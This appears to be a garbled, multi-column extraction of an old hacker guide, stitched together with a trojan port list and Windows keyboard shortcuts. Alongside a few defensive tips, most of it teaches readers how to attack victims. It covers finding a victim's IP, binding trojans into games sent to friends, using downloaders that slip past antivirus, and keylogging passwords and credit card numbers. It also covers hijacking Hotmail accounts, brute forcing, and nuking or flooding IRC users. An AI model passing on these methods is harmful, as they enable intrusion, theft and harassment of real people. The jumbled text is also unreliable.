support Telnet Packets or Connections, or is out". First off, get a WAN-Controller, or any sort
currently restricting proxy access or usage from of program that lets you input screen or
your addy or all addresses. Hardware input by the output. This means you
can control their computer with yours. But you Tip 1: Hackers cover their tracks. Experienced
can't boot this computer, because it will break hackers cover them more thorougly, but amateur
the connection. hackers sometimes leave things behind. Don't
expect them to leave any really big evidence
Access the log files usually in system or behind; expect more of little things here and
system32 (both system files located in there you might find surprising. For example, if
C:/Windows or C:/). There, you will see you're writing a term paper and a black hat
encrypted sh1t. CTRL+A will select it all and hacker accidently saved it when he took a
delete it all. If you do delete this file, (after you paragraph out- that's suspicious. Where did that
do), try recovering the system file. WHATEVER paragraph go? Well, for one thing, now you
YOU DO DON'T DO A SYSTEM RESTORE, know he was in that area. Check the folders
YOU HAVE BEEN WARNED. surrounding the file- you might find something.

Tip 2: Decipher between the type of hackers that


Some hacker has my IP and hacks it every time I are attacking you. Experienced hackers will have
log on. It's static, which means it doesn't change. a more in depth look around when they penetrate
How do I make him stop? I don't know what his your system. They won't touch much because
IP is, either! they know that that won't add too much to their
knowledge. But if you know a hacker's been in,
Go to start, run, "netstat -a". Hacking is almost and some files are messed with, and you have a
equivalent to connecting, if he's hacking you log of someone guessing passwords to a file or
something of that sort, its probably some newbie
your connected to him and he's connected to you.
Netstat -a is a command that allows you to see who's just starting out. These are the easiest
all your connections to hosts and servers, hackers to catch. They usually get so caught up
in thoughts like "I'm in!" that they forget the
associated with TCP/IP. If you see a hostname
that you don't recognize, log it. In fact, click basics, such as work behind a proxy.
Print Screen, go to paint, CTRL+V, Crop the
image of the DOS window for Netstat, and save My friend was setting up a webserver once. His
it. That should be quite easy. first time too, and he wasn't to anxious to set up
some good software to protect against hackers
and viruses. He didn't put up one IDS, and before
How To Catch A you know it, the obvious happened. But this
time, a newbie had struck. The nice log files
showed, bluntly across the screen, multiple
Hacker instances of a foreign IP address that stood out.
Some stupid newbie had tried to login as "uucp"
on my friend's XP computer, with a password of
"uucp." Well, that's great, but he also had tried
the same user/pass combination three times,
enough to get himself logged nicely. Even a
semi-brainless user with some form of
neurological system knows that uucp isn't a
default XP account. Again, excitement toiled this
hacker's brain, and maybe if he hadn't done that,
along with a few other stupid things, he wouldn't
have gotten caught. What other things did he do?
Well, lets see. He openned 35 instances of MS-
DOS. He tried to clean the printer's heads, and he
edited a .gif in notepad. Then he uninstalled a
few programs and installed some html editor,
and replaced four files with the words "14P."

He might as well have posted his phone number.


In a few days, we had tracked him down to a
suburban town in Ohio. We let him go, not
pressing any charges, because he had done Tip 6: Don't rely on luck. Chances are, sometime
nothing really damaging and had provided me or another, you're going to be targeted for an
with an example of a moron for this guide. attack. Here you can rely on luck. Maybe they'll
forget? Maybe they don't know how to do it? If
Tip 3: Don't go crazy if you lose data. Chances you think this way, a surprise is going to hit your
are, if it was that important, you would have face very hard. Another way you could stupidly
backed it up anyway. Most hackers nowadays rely on luck is by saying this: It's probably just a
wish they were back in 1989 when they could whitehat. On the contrary, my friend, it's
use a Black Box and having a Rainbow Book probably just a blackhat. A blackhat with
actually meant something. Most hackers aren't knowledge stored in his head, ready to be used as
blackhat, they are whitehat, and some even an ax. It's your data. You take the chance.
greyhat. But in the end, most hackers that are in
systems aren't satisfied by looking around. From
past experiences, I have concluded that many
hackers like to remember where've they been.
- Scan for an open
So, what do they do? They either press delete
here and there, or copy some files onto their
port - infected
systems. Stupid hackers (yes, there are plenty of
stupid hackers) send files to e-mail addresses. trojan user -
Some free email companies will give you the IP
of a certain e-mail address's user if you can
prove that user has been notoriously hacking
you. But most of the time, by the time you get
the e-mail addy it's been unused for weeks if not
months or years, and services like hotmail have
already deleted it.

Tip 4: Save information! Any information that


you get from a log file (proxy server IP, things
like "14P", e-mail addresses that things were sent
to, etc.) should be saved to a floppy disk (they're
not floppy anymore, I wish I could get out of the Scanning ranges of networks
habit of calling them that) incase there's a next Well , you can try lets say Trojan Hunter from
time. If you get another attack, from the same the Ip scanners section to scan for a range of IP
proxy, or with similar e-mail addresses (e.g: one addresses lets say 212.212.*.* , where * is all the
says Blackjack 123@something.whatever and numbers in network or 212.212.212.* for a
the other says smaller more specified scann i will be soon
Black_jack_45@something.znn.com) you can adding the IP bible so you can find out which IP
make an assumption that these hackers are the addresses apear in lets say asia , or europe , or
same people. In that case, it would probably be greece , or a city , or the village where i am from
worth the effort to resolve the IP using the proxy and scan all the online users from that place , i
and do a traceroute. Pressing charges is promise i will add it as soon i find it again(lost it
recommended if this is a repeat offender. in a drive format while playing around with
some viruses)
Tip 5: Don't be stupid. If you've been hacked,
take security to the next level. Hackers do talk Scanning mIRC chat channels
about people they've hacked and they do post IPs Why scan irc channels? Just because there are
and e-mail addresses. Proof? Take a look at some really big irc channels with 1000+ or 500+
Defcon Conventions. I've never gone to one, but users and thats a nice IP recourse of ready to
I've seen the photos. The "Wall of Shame"-type scan IP addresses i strongly recommend you to
of boards I've seen have IPs and e-mail addresses download IRC Scanner v1.0 by RG its a great
written all over them in fat red, dry-erase ink. tool to gather all the channels ursers IP addresses
Don't be the one to go searching the Defcon and scans them in seconds at the port you choose
website and find your e-mail address posted on in the beggining of the scan
the Wall of Shame board!
TCP 1008 AutoSpy.100
- Trojan ports list - TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110,
SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1 Breach.2001, SocketsDeTroie.230,
TCP 1999 TransmissionScout.100,
SocketsDeTroie.250
TransmissionScout.110
TCP 28 Amanda.200
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 31 MastersParadise.920
TCP 2001 DIRT.220, TrojanCow.100
TCP 68 Subseven.100
TCP 2003 TransmissionScout.100,
TCP 142 NetTaxi.180
TransmissionScout.110
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 2023 RipperPro.100
TCP 171 ATrojan.200
TCP 2040 InfernoUploader.100
TCP 285 WCTrojan.100
TCP 2115 Bugs.100
TCP 286 WCTrojan.100
TCP 2140 DeepThroat.100, DeepThroat.200,
TCP 334 Backage.310
DeepThroat.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 2332 SilentSpy.202
TCP 413 Coma.109
TCP 2589 Dagger.140
TCP 420 Breach.450
TCP 2600 DigitalRootbeer.100
TCP 555 Id2001.100, PhaseZero.100,
TCP 2989 Rat.200
StealthSpy.100
TCP 3128 MastersParadise.970
TCP 623 Rtb666.160
TCP 3129 MastersParadise.920,
TCP 660 Zaratustra.100
MastersParadise.970
TCP 661 Noknok.800, Noknok.820
TCP 3150 DeepThroat.100, DeepThroat.200,
TCP 666 BackConstruction.210,
DeepThroat.310, MiniBacklash.110
BackConstruction.250, Bla.100, Bla.200,
TCP 3215 BlackStar.100, Ghost.230
Bla.400, Bla.503, Cain.150, Dimbus.100,
TCP 3333 Daodan.123
Noknok.820, Ripper.100, SatansBackdoor.100,
TCP 3410 OptixPro.100, OptixPro.110
SatansBackdoor.101, SatansBackdoor.102,
TCP 3456 Force.155, TerrorTrojan.100
Unicorn.100, Unicorn.101, Unicorn.110
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 667 SniperNet.210, Snipernet.220
TCP 3586 Snid.120, Snid.212
TCP 668 Unicorn.101, Unicorn.110
TCP 3700 PortalOfDoom.100
TCP 680 Rtb666.160
TCP 3723 Mantis.100
TCP 777 Tiny.100, Undetected.230,
TCP 3800 Eclypse.100
Undetected.300, Undetected.310,
TCP 3996 RemoteAnything.364
Undetected.320, Undetected.330,
TCP 4000 SkyDance.220, SkyDance.229
Undetected.331, Undetected.332
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 785 NetworkTerrorist.100
TCP 4225 SilentSpy.202
TCP 800 NeuroticKitten.010
TCP 4321 Bobo.100
TCP 831 NeuroticKat.100, NeuroticKat.120,
TCP 4444 AlexTrojan.200, Crackdown.100
NeuroticKat.130
TCP 4488 EventHorizon.100
TCP 901 NetDevil.130, NetDevil.140
TCP 4523 Celine.100
TCP 1000 DerSpaeher.200
TCP 4545 InternalRevise.100,
TCP 1001 Silencer.100
RemoteRevise.150
TCP 4567 FileNail.100 TCP 6660 LameSpy.095
TCP 4666 Mneah.100 TCP 6666 LameRemote.100,
TCP 4950 ICQTrojan.100 ProjectMayhem.100
TCP 5005 Aladino.060 TCP 6669 Vampire.100
TCP 5025 Keylogger.WMRemote.100 TCP 6670 DeepThroat.200, DeepThroat.210
TCP 5031 NetMetro.104 TCP 6671 DeepThroat.310
TCP 5032 NetMetro.104 TCP 6699 HostControl.101
TCP 5033 NetMetro.104 TCP 6711 DeepThroat.300, Noknok.820,
TCP 5050 RoxRat.100 SubSeven.180, SubSeven.190
TCP 5151 OptixLite.020, OptixLite.030, TCP 6712 Subseven.100
OptixLite.040 TCP 6713 Subseven.100
TCP 5190 MBomber.100 TCP 6767 NTRC.120
TCP 5277 WinShell.400 TCP 6776 SubSeven.180, SubSeven.190,
TCP 5343 WCRat.100 Subseven.200
TCP 5400 BackConstruction.120, TCP 6789 Doly.200
BackConstruction.150, BladeRunner.080, TCP 6796 SubSeven.214
DeepThroat.300 TCP 6912 ShitHeep.100
TCP 5401 BackConstruction.120, TCP 6939 Indoctrination.100
BackConstruction.150, BackConstruction.210, TCP 6953 Lithium.100
BackConstruction.250, BladeRunner.080, TCP 6969 2000Cracks.100, Bigorna.100,
DeepThroat.300, Mneah.100 Danton.110, Danton.210, Danton.220,
TCP 5402 BackConstruction.210, Danton.310, Danton.320, Danton.330,
BackConstruction.250, BladeRunner.080, GateCrasher.110, NetController.108, Sparta.110,
DeepThroat.300, Mneah.100 VagrNocker.120
TCP 5534 TheFlu.100 TCP 6970 Danton.330
TCP 5550 XTCP.200, XTCP.201 TCP 7001 Freak88.100
TCP 5555 Noxcape.100, Noxcape.200 TCP 7119 Massaker.100
TCP 5695 Assassin.100 TCP 7200 Massaker.110
TCP 5714 WinCrash.100 TCP 7300 Coced.221
TCP 5741 WinCrash.100 TCP 7301 Coced.221
TCP 5742 WinCrash.103 TCP 7306 NetSpy.200, NetSpy.200
TCP 5802 Y3KRat.160 TCP 7410 Phoenix.190, Phoenix.200
TCP 5810 Y3KRat.160 TCP 7511 Genue.100
TCP 5838 Y3KRat.170 TCP 7609 Snid.120, Snid.212
TCP 5858 Y3KRat.110, Y3KRat.120, TCP 7614 Wollf.130
Y3KRat.140 TCP 7648 BlackStar.100, Ghost.230
TCP 5880 Y3KRat.140 TCP 7788 Last.2000, Matrix.200
TCP 5881 Y3KRat.110, Y3KRat.120, TCP 7826 MiniOblivion.010, Oblivion.010
Y3KRat.140 TCP 7887 SmallFun.110
TCP 5882 Y3KRat.100, Y3KRat.110, TCP 7891 Revenger.100
Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 7979 VagrNocker.200
TCP 5883 Y3KRat.110, Y3KRat.140 TCP 7997 VagrNocker.200
TCP 5884 Y3KRat.140, Y3KRat.150 TCP 8000 XConsole.100
TCP 5885 Y3KRat.110, Y3KRat.120, TCP 8011 Way.240
Y3KRat.140 TCP 8012 Ptakks.215, Ptakks.217
TCP 5886 Y3KRat.120, Y3KRat.140 TCP 8110 LoseLove.100
TCP 5887 Y3KRat.110, Y3KRat.120, TCP 8111 LoseLove.100
Y3KRat.140 TCP 8301 LoseLove.100
TCP 5888 Y3KRat.100, Y3KRat.110, TCP 8302 LoseLove.100
Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 8372 NetBoy.100
TCP 5889 Y3KRat.100, Y3KRat.110, TCP 8720 Connection.130
Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 8734 AutoSpy.110
TCP 5890 Y3KRat.140 TCP 8811 Force.155
TCP 6400 Thething.100, Thething.150 TCP 8899 Last.2000
TCP 6556 AutoSpy.120, AutoSpy.122 TCP 9000 Aristotles.100
TCP 6655 Aqua.020 TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, Bionet.402
InCommand.120, InCommand.130, TCP 12389 KheSanh.210
InCommand.140, InCommand.150, TCP 12478 Bionet.210
InCommand.153, InCommand.160, TCP 12623 Buttman.090, Buttman.100
InCommand.167, InCommand.170 TCP 12624 Buttman.090, Buttman.100
TCP 9401 InCommand.100, InCommand.110, TCP 12625 Buttman.100
InCommand.170 TCP 12904 Akropolis.100, Rocks.100
TCP 9402 InCommand.100, InCommand.110 TCP 13473 Chupacabra.100
TCP 9561 CRatPro.110 TCP 13753 AFTP.010
TCP 9563 CRatPro.110 TCP 14100 Eurosol.100
TCP 9580 TheefLE.100 TCP 14194 CyberSpy.840
TCP 9696 Danton.210, Ghost.230 TCP 14286 HellDriver.100
TCP 9697 Danton.320, Danton.330, Ghost.230 TCP 14500 PCInvader.050, PCInvader.060,
TCP 9870 R3C.100 PCInvader.070
TCP 9872 PortalOfDoom.100 TCP 14501 PCInvader.060, PCInvader.070
TCP 9873 PortalOfDoom.100 TCP 14502 PCInvader.050, PCInvader.060,
TCP 9874 PortalOfDoom.100 PCInvader.070
TCP 9875 PortalOfDoom.100 TCP 14503 PCInvader.050, PCInvader.060,
TCP 9876 Rux.100, SheepGoat.100 PCInvader.070
TCP 9877 SmallBigBrother.020 TCP 14504 PCInvader.050, PCInvader.060
TCP 9878 SmallBigBrother.020, TCP 15092 HostControl.100, HostControl.260
TransmissionScout.100, TransmissionScout.110, TCP 15382 SubZero.100
TransmissionScout.120 TCP 15432 Cyn.210
TCP 9879 SmallBigBrother.020 TCP 15555 ICMIBC.100
TCP 9999 ForcedEntry.100, Infra.100, TCP 16322 LastDoor.100
Prayer.120, Prayer.130, TakeOver.200, TCP 16484 MoSucker.110
TakeOver.300 TCP 16661 Dfch.010
TCP 10001 DTr.130, DTr.140 TCP 16969 Progenic.100
TCP 10013 Amanda.200 TCP 16982 AcidShiver.100
TCP 10067 PortalOfDoom.100 TCP 17300 Kuang.200
TCP 10100 Gift.240 TCP 17499 CrazzyNet.370, CrazzyNet.375,
TCP 10101 NewSilencer.100 CrazzyNet.521
TCP 10167 PortalOfDoom.100 TCP 17500 CrazzyNet.370, CrazzyNet.375,
TCP 10528 HostControl.100, HostControl.260 CrazzyNet.521
TCP 10607 Coma.109 TCP 17569 Infector.141, Infector.160,
TCP 10666 Ambush.100 Infector.170, Infector.180, Infector.190,
TCP 11011 Amanda.200 Infector.200, Intruder.100, Intruder.100
TCP 11050 HostControl.101 TCP 17593 AudioDoor.120
TCP 11051 HostControl.100, HostControl.260 TCP 19191 BlueFire.035, BlueFire.041
TCP 11223 AntiNuke.100, Progenic.100, TCP 19604 Metal.270
Progenic.110 TCP 19605 Metal.270
TCP 11225 Cyn.100, Cyn.103, Cyn.120 TCP 19991 Dfch.010
TCP 11306 Noknok.800, Noknok.820 TCP 20000 Millenium.100
TCP 11831 Katux.200, Latinus.140, Latinus.150, TCP 20001 Millenium.100, PshychoFiles.180
Pest.100, Pest.400 TCP 20002 AcidKor.100, PshychoFiles.180
TCP 11991 PitfallSurprise.100 TCP 20005 MoSucker.200, MoSucker.210,
TCP 12043 Frenzy.2000 MoSucker.220
TCP 12345 Fade.100, Netbus.160, Netbus.170, TCP 21212 Schwindler.182
VagrNocker.400 TCP 21554 Exploiter.100, Exploiter.110,
TCP 12346 Netbus.160, Netbus.170 Girlfriend.130, GirlFriend.135
TCP 12348 Bionet.210, Bionet.261, Bionet.280, TCP 21579 Breach.2001
Bionet.302, Bionet.305, Bionet.311, Bionet.313, TCP 21584 Breach.2001
Bionet.316, Bionet.317 TCP 21684 Intruse.134
TCP 12349 Bionet.084, Bionet.261, Bionet.280, TCP 22068 AcidShiver.110
Bionet.302, Bionet.305, Bionet.311, Bionet.313, TCP 22115 Cyn.120
Bionet.314, Bionet.316, Bionet.317, Bionet.401, TCP 22222 Prosiak.047, Ruler.141, Rux.300,
Rux.400, Rux.500, Rux.600 NetSphere.131
TCP 22223 Rux.400, Rux.500, Rux.600 TCP 30103 NetSphere.131
TCP 22456 Bla.200, Bla.503 TCP 30947 Intruse.134
TCP 22457 AcidShiver.120, Bla.200, Bla.503 TCP 31320 LittleWitch.400, LittleWitch.420
TCP 22784 Intruzzo.110 TCP 31337 BackOrifice.120, Khaled.100,
TCP 22845 Breach.450 OPC.200
TCP 22847 Breach.450 TCP 31415 Lithium.101
TCP 23005 Infinaeon.110, NetTrash.100, TCP 31416 Lithium.100, Lithium.101
Oxon.110, WinRat.100 TCP 31557 Xanadu.110
TCP 23006 Infinaeon.110, NetTrash.100, TCP 31631 CleptoManicos.100
Oxon.110, WinRat.100 TCP 31745 Buschtrommel.100,
TCP 23032 Amanda.200 Buschtrommel.122
TCP 23432 Asylum.010, Asylum.012, TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
Asylum.013, Asylum.014, MiniAsylum.110 TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 23456 EvilFTP.100, VagrNocker.400 TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 23476 DonaldDick.153, DonaldDick.154, TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
DonaldDick.155 TCP 31887 BDDT.100
TCP 23477 DonaldDick.153 TCP 31889 BDDT.100
TCP 24000 Infector.170 TCP 32100 ProjectNext.053
TCP 24307 Wildek.020 TCP 32418 AcidBattery.100
TCP 25386 MoonPie.220 TCP 32791 Akropolis.100, Rocks.100
TCP 25486 MoonPie.220 TCP 33291 RemoteHak.001
TCP 25555 FreddyK.100, FreddyK.200 TCP 33333 Blackharaz.100, Prosiak.047,
TCP 25556 FreddyK.100 SubSeven.214
TCP 25685 MoonPie.010, MoonPie.012, TCP 33577 SonOfPsychward.020
MoonPie.130, MoonPie.220, MoonPie.240, TCP 34324 TelnetServer.100
MoonPie.400 TCP 34763 Infector.180, Infector.190,
TCP 25686 MoonPie.135, MoonPie.200, Infector.200
MoonPie.400 TCP 35000 Infector.190, Infector.200
TCP 25982 MoonPie.135, MoonPie.200 TCP 35600 Subsari.140
TCP 26274 Delta.050 TCP 36794 BugBear.100
TCP 27160 MoonPie.135, MoonPie.200 TCP 37237 Mantis.020
TCP 27184 Alvgus.100, Alvgus.800 TCP 37651 YAT.210
TCP 27374 Muerte.110, Subseven.210, TCP 37653 YAT.310
SubSeven.213 TCP 40308 Subsari.140
TCP 28429 Hack'a'Tack.2000 TCP 40412 TheSpy.100
TCP 28430 Hack'a'Tack.2000 TCP 40421 MastersParadise.970
TCP 28431 Hack'a'Tack.2000 TCP 40422 MastersParadise.970
TCP 28432 Hack'a'Tack.2000 TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 28433 Hack'a'Tack.2000 TCP 41626 Shah.100
TCP 28434 Hack'a'Tack.2000 TCP 44444 Prosiak.070
TCP 28435 Hack'a'Tack.2000 TCP 45673 Akropolis.100, Rocks.100
TCP 28436 Hack'a'Tack.2000 TCP 47262 Delta.050
TCP 29559 DuckToy.100, DuckToy.101, TCP 48006 Fragglerock.200
Katux.200, Latinus.140, Latinus.150, Pest.100, TCP 49683 HolzPferd.210
Pest.400 TCP 50000 Infector.180
TCP 29891 Unexplained.100 TCP 50130 Enterprise.100
TCP 30000 Infector.170 TCP 50766 Fore.100
TCP 30001 Error32.100 TCP 51234 Cyn.210
TCP 30003 LamersDeath.100 TCP 51966 Cafeini.080, Cafeini.110
TCP 30029 AOLTrojan.110 TCP 54321 PCInvader.010
TCP 30100 NetSphere.127, NetSphere.130, TCP 57341 NetRaider.100
NetSphere.131 TCP 57922 Bionet.084
TCP 30101 NetSphere.127, NetSphere.130, TCP 58008 Tron.100
NetSphere.131 TCP 58009 Tron.100
TCP 30102 NetSphere.127, NetSphere.130, TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101 UDP 28432 Hack'a'Tack.2000
TCP 59345 NewFuture.100 UDP 28433 Hack'a'Tack.2000
TCP 60000 DeepThroat.300, MiniBacklash.100, UDP 28434 Hack'a'Tack.2000
MiniBacklash.101, MiniBacklash.101 UDP 28435 Hack'a'Tack.2000
TCP 60411 Connection.100, Connection.130 UDP 28436 Hack'a'Tack.2000
TCP 60412 Connection.130 UDP 29891 Unexplained.100
TCP 60552 RoxRat.100 UDP 30103 NetSphere.131
TCP 63536 InsaneNetwork.500 UDP 31320 LittleWitch.400, LittleWitch.420
TCP 63878 AphexFTP.100 UDP 31337 BackOrifice.120, OPC.200
TCP 63879 AphexFTP.100 UDP 31416 Lithium.100, Lithium.101
TCP 64969 Lithium.100 UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 65000 Socket.100 UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 1 SocketsDeTroie.250 UDP 33333 Blackharaz.100
UDP 666 Bla.200, Bla.400, Bla.503, UDP 47262 Delta.050
Noknok.820 UDP 49683 HolzPferd.210
UDP 1130 Noknok.800, Noknok.820 UDP 60000 MiniBacklash.100
UDP 2140 DeepThroat.100, DeepThroat.200,
DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920,
- Scan for an open
MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, port - infected
DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
trojan user -
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
- Get an IP address
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140 -
UDP 5882 Y3KRat.100, Y3KRat.110,
Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120,
Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120,
Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110,
Y3KRat.120, Y3KRat.150 A little hand for the newbies-lamers here.
UDP 6953 Lithium.100
UDP 8012 Ptakks.217 Find an msn messengers contact IP address
UDP 10067 PortalOfDoom.100 The only way i know to do that is to send to the
UDP 10167 PortalOfDoom.100 contact a file while he is online , send him/her a
UDP 10666 Ambush.100 photo or something else , doing that a peer-to-
UDP 11225 Cyn.100, Cyn.103, Cyn.120 peer connection opens while your friend gets the
UDP 11306 Noknok.800, Noknok.820 file/photo no matter what it is , make sure that
UDP 12389 KheSanh.210 you have a DOS Prompt open (located at:start >
UDP 12623 Buttman.090, Buttman.100 programs > MS-DOS Prompt) and type the
UDP 12625 Buttman.100 command: netstat while sending them the file
UDP 14100 Eurosol.100 and you will see a list in the DOS Prompt of all
UDP 23476 DonaldDick.155 the connections your computer has that time ,
UDP 26274 Delta.050 one of them must be your friend that is receiving
UDP 27184 Alvgus.100 the file.If i hear about an other easier way that
UDP 28431 Hack'a'Tack.2000
you get it without sending files be sure i will post servers of some trojans may have passwords in
it here. that case the server is stand by for a connection
and a password , when you log into the victim
Find an IP though mIRC chat channels the server enables you to run many commands
There is the /dns nickname command in irc but by pressing buttons in your client ,the trojans
some people use proxies or shells and you cant were made to run those commands faster by
see their real address,how do you know if the pressing buttons.
user uses a web-shell or a proxy? well... guess
that yourself while looking the ip you got from Antiviruses
the /dns nickname command , make sure you All the antiviruses like Mc Affee ,Norton ect will
check out IRC Scanner v1.0 by RG in our identify like a virus and try to delete all the
programming section and in IP scanners section , trojan servers you plan to send to your victims ,
its the best and fastest way to scan the users in also all the trojan clients even the server editor
IRC channels. all the trojans are identified like viruses with all
their files so dont send me e-mails tellin me my
Get your friends IP address by sending them files are infected ! they are not infected , they are
to your page the original viruses and you wont get any
Build a simple site in geocities or anywhere else troubles if you know what you are doin.
, then go t http://www.stats4all.com and create
an account , they provide free website statistics , What to do with a trojan
add their code to your site and tell your friend to Another question you keep askin me how to use
check out a cool page you just made , when he a trojan and what to do with it ...
visits the page his IP will be logged in You can play with it , open the cds and laugh
stats4all.com so after your friend visits your page like stupid that you are , or redirect ports for
check out your stats in stats4all.com and you will other purposes , enable keyloggers and get the
find the last 5 visitors at the left of the stats page passwords , log on into their mails , who knows ,
, your friends IP included. you might key-log their gredit card numbers
...you can make them log in irc servers like bots
to see whos online and a lot more
- How a trojan
works in a few - Some ways to
words - infect someone
with a virus or a
What the fuck is a trojan?
A Trojan is a Remote Admin Tool , there is a
server that runs invisible on the victim and the
trojan -
client that you run on your computer to take
control of the victim ,you cant connect to the Bind 2 exes (infect a game or any other .exe
victim if he hasnt run the file yet ,there are many with your virus/trojan)
trojans around with different commands , layouts A simple thing to do is bind a game with the
, extras ect , the trojans usually include a server virus or trojan , lets say you have game.exe and
builder that its safe to run on your computer you server.exe , there are some programs that will
can browse to the server.exe and edit some add server.exe into game.exe , so when the
options , like passwords or ports before sendin program connects those two files it gives you a
it... file.exe that will have both game and server in it
, send it to your friends and say its just a game ,
How it works binder is the program you need to connect these
When the victim runs the server.exe the server file and can be found in Trojans/Backdoors
runs invisible on the victim ,he doesnt see section.
anything.The server keeps a port open lets say
27374 port and waits for a connection , some Send them a downloader
A downloader will automaticaly download AND victims will have the auto-coplete on so this will
execute any file from the internet on the victims wont work 100%)
computer as soon as they open the
downloader,here it goes:a downloader is 2-4 Kb Way #3 : MSN proggies
only! it can be added in a game.exe with the way There are some MSN programs for that job (like
above,you have to upload your trojan/virus on a furax), you send to your friend/victim a file thats
server lets say geocities then you set up the 12Kb and when they run it (ask them if they did
downloader to download and run this file,you someway) you type a command in yours-theirs
send the 4Kb file to the victim and as soon his chat window and it logs them off , when they log
computer runs the file it starts downloading the in again the program will have the username and
trojan/virus from geocities,the victim will see the password , you type another command in the
nothin, the VIR SCANNERS CANT SEE IT chat MSN chat window again and the victim
BUT they will detect the trojan/virus that it will sends you automaticaly (and invisible) the user
download.Downloader is what you are lookin for and the password.I guess Furax doesnt work now
and can be found in Trojans/Backdoors section. but there are new versions that do the same job.

Infected webpage (.EML Bug) Way #4 :Brute Forcer


Another way is to build a webpage that contains Called brute forcers , some programs made to
a virus and infects the visitors with explorer send multiple password or user/password request
5.01-5.5 versions with any virus , i havent test it to a server, untill they get the right password for
yet and i am not sure if and how it works but i the username!This way might take long or might
have seen programs around that promt you to not work at all with Hotmail now but who
choose a trojan/virus then it decodes it and the it knows?There are other sites too
gives you the html that contains the virus the
problem is that it takes long time to decode it and
its better if your virus is 1-30Kb other ways it ll
take days to decode , as i said i havent test it yet
- Nuke people from
and i wont be able to write more or reply to any
emails askin for it.
IRC -
Best way (if you have access on the victims
pc)
Get a floppy disc and do the job :-) ...Ok
40% of the followin will work

- The only ways to


hack hotmail -
Well i guess that trying to hack hotmail is
impossible but if there is a way it should be one
of those:

Way #1 : Keylogger
A keylogger copies all the buttons pressed by the
victim in a .txt file,all you need is access to the
victims PC with a trojan or even go there with a
disc ,this is one of the best ways to get his user-
password and log in his account and many more
things!

Way #2 : Trojan Nuker Click 2.2


Some trojans have an option that gets the victims There is a nuker that will attemp to disconnect
passwords and usernames by pressin a button ,all the victim from the irc server, you perform the
you have to do is infect him ... (not all of the /whois nickname command to the victim and you
will get :
Nickname is username@ppp-208-138-219-
60.coqui.net * kyk
Nickname on @#Astynomia @#night_vision
#mp3 #hellas
Nickname using nini.irc.gr
Nickname End of /WHOIS list.
This is the /whois nickname command result , in
yellow you see the host of the victim and in
green you see the server that the victim uses ,
you need to add those in the nuker and press the
button , you cant see which port the victim uses
but the default is 6667 ,some networks mask
your real hostname so you wont be able to use
this nuker there, i v tested zone alarm and it
detects and stop this attack something that black
ICE just lets in and nuke you,i dont quarranty
you that will work , it worked for me 70% of
times on Gr-Net (nini.irc.gr).What you are lookin
for is Click 2.2 and can be found in [Nukers-
Flooders] section.

Flooder
There are some cool flooders that all they do is
connect clones (many fake irc users commin
from your pc) in the network and priv-message a
user , that causes excess flood quit :-) there is
also a choise on the flooder that you can message
a whole channel, i still remember gettin in #mp3
and flooding the !list command in the channel
with 50 clones , all the F-Servs were down , and
the channel was f***ed up.
Best Keyboard Shortcuts
acessability shortcuts
Getting used to using your keyboard exclusively and leaving your
mouse behind will make you much more efficient at performing Right SHIFT for eight seconds........ Switch FilterKeys on and
any task on any Windows system. I use the following keyboard off.
shortcuts every day: Left ALT +left SHIFT +PRINT SCREEN....... Switch High
Contrast on and off.
Windows key + R = Run menu Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys
on and off.
This is usually followed by: SHIFT....... five times Switch StickyKeys on and off.
cmd = Command Prompt NUM LOCK...... for five seconds Switch ToggleKeys on and
iexplore + "web address" = Internet Explorer off.
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management explorer shortcuts
dnsmgmt.msc = DNS Management END....... Display the bottom of the active window.
services.msc = Services HOME....... Display the top of the active window.
eventvwr = Event Viewer NUM LOCK+ASTERISK....... on numeric keypad (*) Display
dsa.msc = Active Directory Users and Computers all subfolders under the selected folder.
dssite.msc = Active Directory Sites and Services NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display
Windows key + E = Explorer the contents of the selected folder.
ALT + Tab = Switch between windows NUM LOCK+MINUS SIGN....... on numeric keypad (-)
ALT, Space, X = Maximize window Collapse the selected folder.
CTRL + Shift + Esc = Task Manager LEFT ARROW...... Collapse current selection if it's expanded,
Windows key + Break = System properties or select parent folder.
Windows key + F = Search RIGHT ARROW....... Display current selection if it's
Windows key + D = Hide/Display all windows collapsed, or select first subfolder.
CTRL + C = copy
